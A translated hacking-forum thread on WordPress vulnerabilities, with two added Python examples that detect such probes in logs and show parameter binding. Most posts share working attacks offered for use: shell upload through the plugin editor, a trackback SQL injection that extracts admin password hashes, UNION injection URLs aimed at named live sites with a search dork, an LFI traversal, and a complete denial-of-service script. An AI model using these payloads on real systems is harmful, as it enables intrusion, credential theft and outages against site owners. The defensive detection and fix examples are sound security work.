[ Overview of WordPress vulnerabilities ]

Discussion in 'Web vulnerabilities' started by ettee, 5 Oct 2007.

  1. karencho777

    karencho777 New Member

    Could someone tell me how to find out the WordPress version?
     
  2. total90

    total90 Elder


    In the page source.
    <meta name="generator" content="WordPress x.x" />
     
  3. Ins3t

    Ins3t Kharkiv resident

    What do you mean it processes php.jpg as php?
    First time I've heard of that.

    It will process it as an image, so to execute the script's code you'd have to look for, say, an include :)
     
    1 person likes this.
  4. Refqs

    Refqs Banned

    Are there any vulnerabilities for wp 3.0.1?
     
  5. Uex Urgent

    Uex Urgent Malicious Smiley


    http://blog.ru/wp-admin/post-new.php

    Vulnerable field: "Title"
    Vulnerability type: stored XSS
    Publishing the post leads to XSS on the front page.

    Found it yesterday, tested it on my own blog.
     
    3 people like this.
  6. RA1Sh

    RA1Sh New Member

    How do you close it? ))
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Nuclear Suicide ✯✯✯ ]

    #147 Дирижабль, 17 Aug 2010
    Last edited: 17 Aug 2010
  8. Дирижабль

    Дирижабль [ ✯✯✯ Nuclear Suicide ✯✯✯ ]

    WordPress 3.0.1
    Poked around a bit and found some paths.

    Path disclosure:
    Code:
    http://localhost/wordpress/wp-admin/edit.php?post_type[]=page
    http://localhost/wordpress/wp-admin/options-general.php?page[]=
    http://localhost/wordpress/wp-admin/post-new.php?post_type[]=page
    http://localhost/wordpress/wp-admin/plugins.php?activate=true&plugin_status=all&paged[]=1
    http://localhost/wordpress/wp-admin/plugin-editor.php?file[]=
    Uploading a shell through the admin panel:
    delete everything and write the shell's source code..
    the shell will be at site/wordpress/wp-content/plugins/.
     
    #148 Дирижабль, 19 Aug 2010
    Last edited: 19 Aug 2010
    7 people like this.
  9. Refqs

    Refqs Banned

    OK, here's a couple more disclosures I dug up:
     
  10. Uex Urgent

    Uex Urgent Malicious Smiley

    In the 3.x branch almost all php files have a get_header(); handling error that leads to path disclosure; on my site I simply suppressed error output by adding error_reporting (0);.

    If there's another way to solve this, I'd be glad to hear it :) .
     
    1 person likes this.
  11. SuNDowN

    SuNDowN Member

    Can anyone tell me about the vulnerability for pulling FTP credentials out of WP versions 2.8.6-3.0.0? Or pulling admin credentials?
     
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    WordPress 2.9.2

    Code:
    http://127.0.0.1/wordpress/wp-admin/includes/misc.php
    http://127.0.0.1/wordpress/wp-admin/import/rss.php
    http://127.0.0.1/wordpress/wp-admin/includes/admin.php
    http://127.0.0.1/wordpress/wp-admin/includes/file.php
    http://127.0.0.1/wordpress/wp-admin/includes/comment.php
    http://127.0.0.1/wordpress/wp-admin/includes/user.php
    http://127.0.0.1/wordpress/wp-admin/includes/update.php
    
    + by default you can browse the contents of http://127.0.0.1/wordpress/wp-admin/includes/, which has many files with path disclosure.

    Sorry if this is old news.
     
    #152 <Cyber-punk>, 27 Sep 2010
    Last edited: 27 Sep 2010
  13. krobol

    krobol Elder

    SQL injection in WordPress up to version 3.0.1 (Author rights required)

    Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
    Access Vector: Network
    Attack Complexity: Medium
    Authentication: Single Instance
    Confidentiality Impact: Partial
    Integrity Impact: None
    Availability Impact: None

    Code:
    UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this article. 
      
    The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that 
    comes from the user, allowing a remote user with publish_posts and edit_published_posts 
    capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any 
    information stored in the WordPress database. 
      
    function do_trackbacks($post_id) { 
        global $wpdb; 
       
        $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) ); 
        $to_ping = get_to_ping($post_id); 
        $pinged  = get_pung($post_id); 
        if ( empty($to_ping) ) { 
            $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) ); 
            return; 
        } 
       
        if ( empty($post->post_excerpt) ) 
            $excerpt = apply_filters('the_content', $post->post_content); 
        else 
            $excerpt = apply_filters('the_excerpt', $post->post_excerpt); 
        $excerpt = str_replace(']]>', ']]&gt;', $excerpt); 
        $excerpt = wp_html_excerpt($excerpt, 252) . '...'; 
       
        $post_title = apply_filters('the_title', $post->post_title); 
        $post_title = strip_tags($post_title); 
       
        if ( $to_ping ) { 
            foreach ( (array) $to_ping as $tb_ping ) { 
                $tb_ping = trim($tb_ping); 
                if ( !in_array($tb_ping, $pinged) ) { 
                    trackback($tb_ping, $post_title, $excerpt, $post_id); 
                    $pinged[] = $tb_ping; 
                } else { 
                    $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) ); 
                } 
            } 
        } 
    } 
      
    The $tb_ping variable is passed to the query in line 1657 unescaped. 
      
    Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities 
    (this corresponds to the Author role). 
      
    First, the user creates a new post (title/content does not matter); the text to put into the "Send Trackbacks" field is: 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    and publishes it. He needs to wait a bit for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed: 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    Then the user goes back and edits the post. 
      
    Now the user duplicates the text in the "Send Trackbacks" field and updates the post: 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    The get_to_ping() function says that these trackbacks are to be processed: 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    Query logging shows that WordPress executes this query (reformatted for the sake of readability): 
      
    UPDATE wp_posts 
    SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', '')) 
    WHERE ID = 11 
      
    After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box. 
      
    Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed. 
    The examples above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.
    Just checked it on Denwer. Works on 3.0.1, doesn't on 3.0.2.
     
    #153 krobol, 12 Dec 2010
    Last edited: 12 Dec 2010
  14. z0mbyak

    z0mbyak Active Member

    FBConnect SQL-InJ

    Good day. I was poking around WordPress and here's what I dug up)

    Type: SQL-Inj

    Plugin: No idea what exactly it's called, since I didn't crack the password) but it's some Facebook-related one)

    Dork: inurl:"fbconnect_action=myhome"

    The actual PoC:

    http://www.sociable.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
    or
    http://binaries.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

    P.S. I don't think it's old news, though I don't work with WordPress, so I'm not sure)

    P.P.S. In Google
    Have fun)))
     
    12 people like this.
  15. ta-kyn

    ta-kyn Member

  16. White Bear

    White Bear New Member

    LFI

    Vulnerable Plugin: WordPress WP Custom Pages 0.5.0.1


    Type vulnerable: LFI


    Description: The vulnerability allows a remote user to access arbitrary files on the server by means of a specially crafted request.

    -=POC=-
    Code:
    http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
    Author: AutoSec Tools
     
    #156 White Bear, 5 Apr 2011
    Last edited: 5 Apr 2011
    2 people like this.
  17. ^_WhitE_DeMoN_^

    Wordpress 3.0.1 - Remote Denial Of Service Exploit

    PHP:
    <?php

    // Curl php5 ;)

    function info()
    {
        echo "##################################################################\n";
        echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";
        echo "# Author: KnocKout\n";
        echo "# Greatz : DaiMon,BARCOD3\n";
        echo "##################################################################\n";
        echo "# php poc.php target\n";
        echo "# php poc.php http://www.victim.com/PATH/ 20 5\n";
        echo "________________________________________\n";
        exit;
    }

    // expects the script name plus three arguments: base URL, thread count, timeout (see usage above)
    if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))
    {
        info();
    }

    $url = $argv[1];
    $threads = (int) $argv[2];
    $timeout = (int) $argv[3];

    // number of 100 ms polling iterations after which a batch of requests is abandoned
    $ptimeout = $timeout * 100;

    $packet = implode('+', range(100,999));

    while(1)
    {
        $m = curl_multi_init();

        for($i = 0; $i < $threads; $i++)
        {
            $c[$i] = curl_init();
            $opts = array
            (
                CURLOPT_URL            => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',
                CURLOPT_USERAGENT      => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',
                CURLOPT_ENCODING       => 'gzip, deflate',
                CURLOPT_POST           => 1,
                CURLOPT_POSTFIELDS     => 'search_keywords=' . $packet . '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
                CURLOPT_RETURNTRANSFER => 1,
                CURLOPT_TIMEOUT        => $timeout,
            );
            curl_setopt_array($c[$i], $opts);
            curl_multi_add_handle($m, $c[$i]);
        }

        $t = 0;
        do
        {
            curl_multi_exec($m, $r);
            usleep(100000);

            $t++;

            if($t > $ptimeout)
            {
                curl_multi_close($m);
                for($i = 0; $i < $threads; $i++)
                {
                    curl_close($c[$i]);
                }
                break;
            }
        }
        while($r > 0);

        echo '.';
    }
    ?>
     
  18. randman

    randman Members of Antichat

    Some time ago I found a vulnerability in the engine I needed:
    SQL injection: URL: /wp-content/plugins/wpforum/sendmail.php
    Version: WordPress 2.7.1
    Vulnerable parameter: GET id
    Exploit: /wp-content/plugins/wpforum/sendmail.php?action=quote&id=1+union+select+1,2,3+--+
     
    #158 randman, 30 Apr 2011
    Last edited: 9 May 2011
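The request shapes quoted in this thread (array-parameter path-disclosure probes against wp-admin, UNION SELECT in the fbconnect and wpforum parameters, the ..%2f traversal against wp-download.php, and a POST flood at wp-links-opml.php) all leave a recognisable trace in the web server's access log. The script below is an added example by the editor, not code from any poster; it reads Apache common-log-format lines, and the log lines, IP addresses and flood threshold are constructed for the demo.

```python
"""Spot the WordPress probes discussed in this thread in an access log.

Editor's added example, not code from any poster. It parses Apache common
log format lines, normalizes the request path (double percent-decoding,
lower-casing) and matches a few request shapes: array-parameter path
disclosure probes against wp-admin, UNION SELECT in a query string,
directory traversal, and bursts of POSTs to wp-links-opml.php. All log
lines, addresses and the flood threshold are constructed for the demo.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Matched against the normalized path; rule names are ours.
RULES = [
    # wp-admin/edit.php?post_type[]=page style probes (PHP warning -> full path)
    ("fpd-array-param", re.compile(r"/wp-admin/.*\[\]=")),
    # fbuserid=1+and+1=2+union+select... / sendmail.php?id=1+union+select...
    ("sqli-union", re.compile(r"union[\s/*+]+select")),
    # wp-download.php?url=..%2f..%2f..
    ("traversal", re.compile(r"\.\./")),
]


def normalize(path):
    """Decode twice so double percent-encoding does not slip past the rules."""
    return unquote_plus(unquote_plus(path)).lower()


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Names of all rules the request matches (usually zero or one)."""
    target = normalize(entry["path"])
    return [name for name, rx in RULES if rx.search(target)]


def scan(lines, opml_threshold=10):
    """Return per-request rule hits and source IPs that flood wp-links-opml.php."""
    hits, opml_posts = [], Counter()
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        for rule in classify(entry):
            hits.append((entry["ip"], rule, entry["path"]))
        if entry["method"] == "POST" and "wp-links-opml.php" in entry["path"].lower():
            opml_posts[entry["ip"]] += 1
    floods = {ip: n for ip, n in opml_posts.items() if n >= opml_threshold}
    return {"hits": hits, "floods": floods}


# Constructed sample log: one benign request, probes shaped like the thread's
# examples, and a dozen POSTs from one address against the link_cat endpoint.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Aug/2010:10:00:01 +0000] "GET /wordpress/wp-admin/edit.php?post_type[]=page HTTP/1.1" 200 512',
    '203.0.113.5 - - [19/Aug/2010:10:00:02 +0000] "GET /wordpress/wp-admin/plugin-editor.php?file%5B%5D= HTTP/1.1" 200 498',
    '198.51.100.7 - - [12/Dec/2010:11:30:00 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [30/Apr/2011:11:31:00 +0000] "GET /wp-content/plugins/wpforum/sendmail.php?action=quote&id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 300',
    '192.0.2.9 - - [05/Apr/2011:12:00:00 +0000] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 1200',
    '192.0.2.10 - - [05/Apr/2011:12:00:01 +0000] "GET /wp-admin/edit.php?post_type=page HTTP/1.1" 200 4000',
] + [
    f'203.0.113.99 - - [17/Aug/2010:09:00:{i:02d} +0000] "POST /wordpress/wp-links-opml.php?link_cat=--0-0-0-0 HTTP/1.1" 200 10'
    for i in range(12)
]

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for ip, rule, path in result["hits"]:
        print(f"{rule:16} {ip:14} {path}")
    for ip, n in result["floods"].items():
        print(f"opml-flood       {ip:14} {n} POSTs")
```

The benign `post_type=page` request is left alone, while the `%5B%5D=` variant is caught only because the path is decoded before matching; the flood rule counts per source address rather than matching the `link_cat` value, since a legitimate OPML export is a single GET and any burst of POSTs to that endpoint is suspect on its own.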
  19. ta-kyn

    ta-kyn Member

    2SergioBlog possibly a Flash XSS.
    _http://www.securitylab.ru/analytics/216391.php
    _http://www.inattack.ru/article/572.html
    + my note: _http://ramb.datapunk.ru/index.php/2011/04/flash-xss-persistent/
     
  20. абвгдешка

    WordPress 3.1.3 SQL Injection Vulnerabilities

    Code:
    SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
    =======================================================================
                  title: Multiple SQL Injection Vulnerabilities
                product: WordPress
     vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
          fixed version: 3.1.4/3.2-RC3
                 impact: Medium
               homepage: http://wordpress.org/
                  found: 2011-06-21
                     by: K. Gudinavicius                            
                         SEC Consult Vulnerability Lab
                         https://www.sec-consult.com
    =======================================================================
     
    Vendor description:
    -------------------
    "WordPress was born out of a desire for an elegant, well-architectured
    personal publishing system built on PHP and MySQL and licensed under
    the GPLv2 (or later). It is the official successor of b2/cafelog.
    WordPress is fresh software, but its roots and development go back to
    2001."
     
    Source: http://wordpress.org/about/
     
     
     
    Vulnerability overview/description:
    -----------------------------------
    Due to insufficient input validation in certain functions of WordPress
    it is possible for a user with the "Editor" role to inject arbitrary
    SQL commands. By exploiting this vulnerability, an attacker gains
    access to all records stored in the database with the privileges of the
    WordPress database user.
     
     
     
    Proof of concept:
    -----------------
    1) The get_terms() filter declared in the wp-includes/taxonomy.php file
    does not properly validate user input,  allowing an attacker with
    "Editor" privileges to inject arbitrary SQL commands in the "orderby"
    and "order" parameters passed as array members to the vulnerable filter
    when sorting for example link categories.
     
    The following URLs could be used to perform blind SQL injection
    attacks:
     
    http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL injection]&order=[SQL injection]
    http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL injection]&order=[SQL injection]
    http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL injection]&order=[SQL injection]
     
     
    2) The get_bookmarks() function declared in the
    wp-includes/bookmark.php file does not properly validate user input,
    allowing an attacker with "Editor" privileges to inject arbitrary SQL
    commands in the "orderby" and "order" parameters passed as array
    members to the vulnerable function when sorting links.
     
    The following URL could be used to perform blind SQL injection attacks:
     
    http://localhost/wp-admin/link-manager.php?orderby=[SQL injection]&order=[SQL injection]
     
     
    Vulnerable / tested versions:
    -----------------------------
    The vulnerability has been verified to exist in version 3.1.3 of
    WordPress, which is the most recent version at the time of discovery.
     
     
    Vendor contact timeline:
    ------------------------
    2011-06-22: Contacting vendor through security () wordpress org
    2011-06-22: Vendor reply, sending advisory draft
    2011-06-23: Vendor confirms security issue
    2011-06-30: Vendor releases patched version
    2011-07-01: SEC Consult publishes advisory
     
     
     
    Solution:
    ---------
    Upgrade to version 3.1.4 or 3.2-RC3
     
     
    Workaround:
    -----------
    A more restrictive role, e.g. "Author", could be applied to the user.
     
     
     
    Advisory URL:
    -------------
    https://www.sec-consult.com/en/advisories.html
     
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    SEC Consult Unternehmensberatung GmbH
     
    Office Vienna
    Mooslackengasse 17
    A-1190 Vienna
    Austria
     
    Tel.: +43 / 1 / 890 30 43 - 0
    Fax.: +43 / 1 / 890 30 43 - 25
    Mail: research at sec-consult dot com
    https://www.sec-consult.com
     
    EOF K. Gudinavicius / @2011
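The two core-WordPress injections in this thread are different bug classes with different fixes. krobol's do_trackbacks() case splices a value (the trackback URL) into REPLACE(), which parameter binding fixes outright. The SEC Consult advisory above concerns "orderby"/"order", which name a column and a sort direction; identifiers cannot be bound as parameters, so the only fix is an allowlist. The script below is an added example by the editor (not WordPress code and not the advisory's), written in Python over sqlite3 so it runs stand-alone; the table, rows, column names and payload strings are constructed for the demo and merely mimic the shapes quoted in the thread.

```python
"""Parameter binding vs. identifier allowlisting for SQL built from request data.

Editor's added example (not WordPress code): a miniature posts table in
sqlite3, one UPDATE that splices a value into REPLACE() the way the quoted
do_trackbacks() does, and one SELECT whose ORDER BY comes from "orderby" /
"order" parameters as in the get_terms()/get_bookmarks() advisory.
Table, rows, column names and payloads are constructed for the demo.
"""
import sqlite3


def make_db():
    """Fresh in-memory table; 'secret' stands in for the wp_users data the
    injections in the thread read out."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, "
        "to_ping TEXT, filtered TEXT, secret TEXT)"
    )
    con.executemany(
        "INSERT INTO posts VALUES (?, ?, ?, ?, ?)",
        [
            (1, "zeta", "http://a/ http://b/", "", "s3cr3t-salt"),
            (2, "alpha", "http://c/", "", "other"),
        ],
    )
    con.commit()
    return con


# Constructed payload shaped like the do_trackbacks() one quoted above: it
# closes the REPLACE() string, appends extra SET clauses and re-opens a string.
PAYLOAD = (
    "http://a/','')),title=(SELECT secret FROM posts WHERE id=1),"
    "filtered=TRIM(REPLACE(to_ping,'"
)


def strip_ping_unsafe(con, post_id, tb_ping):
    """Vulnerable: the trackback URL is interpolated into the statement."""
    con.execute(
        f"UPDATE posts SET to_ping = TRIM(REPLACE(to_ping, '{tb_ping}', '')) "
        f"WHERE id = {int(post_id)}"
    )


def strip_ping_safe(con, post_id, tb_ping):
    """Fixed: the URL is bound as a parameter, so it is only ever a string value."""
    con.execute(
        "UPDATE posts SET to_ping = TRIM(REPLACE(to_ping, ?, '')) WHERE id = ?",
        (tb_ping, post_id),
    )


def title_of(con, post_id):
    return con.execute("SELECT title FROM posts WHERE id = ?", (post_id,)).fetchone()[0]


def to_ping_of(con, post_id):
    return con.execute("SELECT to_ping FROM posts WHERE id = ?", (post_id,)).fetchone()[0]


# ORDER BY takes identifiers, not values, so binding cannot help here;
# the fix is to map the request parameters onto a fixed allowlist.
ALLOWED_ORDERBY = {"id", "title"}
ALLOWED_ORDER = {"asc", "desc"}


def oracle(prefix):
    """Constructed boolean expression: the sort order changes with the secret,
    which is what 'blind' injection through a sort parameter means."""
    return (
        f"(CASE WHEN (SELECT secret FROM posts WHERE id=1) LIKE '{prefix}%' "
        "THEN id ELSE title END)"
    )


def list_titles_unsafe(con, orderby, order):
    """Vulnerable: 'orderby'/'order' go straight into the statement."""
    rows = con.execute(f"SELECT title FROM posts ORDER BY {orderby} {order}")
    return [r[0] for r in rows]


def list_titles_safe(con, orderby, order):
    """Fixed: reject anything that is not a known column / direction."""
    col, direction = orderby.lower(), order.lower()
    if col not in ALLOWED_ORDERBY or direction not in ALLOWED_ORDER:
        raise ValueError("orderby/order not in allowlist")
    return [r[0] for r in con.execute(f"SELECT title FROM posts ORDER BY {col} {direction}")]


if __name__ == "__main__":
    con = make_db()
    strip_ping_unsafe(con, 1, PAYLOAD)
    print("unsafe UPDATE, title now:", title_of(con, 1))
    con = make_db()
    strip_ping_safe(con, 1, PAYLOAD)
    print("safe UPDATE, title still:", title_of(con, 1))
    con = make_db()
    print("unsafe ORDER BY:", list_titles_unsafe(con, oracle("s"), "asc"),
          list_titles_unsafe(con, oracle("x"), "asc"))
    try:
        list_titles_safe(con, oracle("s"), "asc")
    except ValueError as exc:
        print("safe ORDER BY:", exc)
```

The allowlist deliberately maps to fixed strings rather than "sanitising" the input: once the column and direction are known members of a set you control, interpolating them is safe, and everything else is rejected before it reaches the database. The same shape is what the advisory's workaround (a more restrictive role) only approximates, since it limits who can reach the parameter rather than what the parameter can contain.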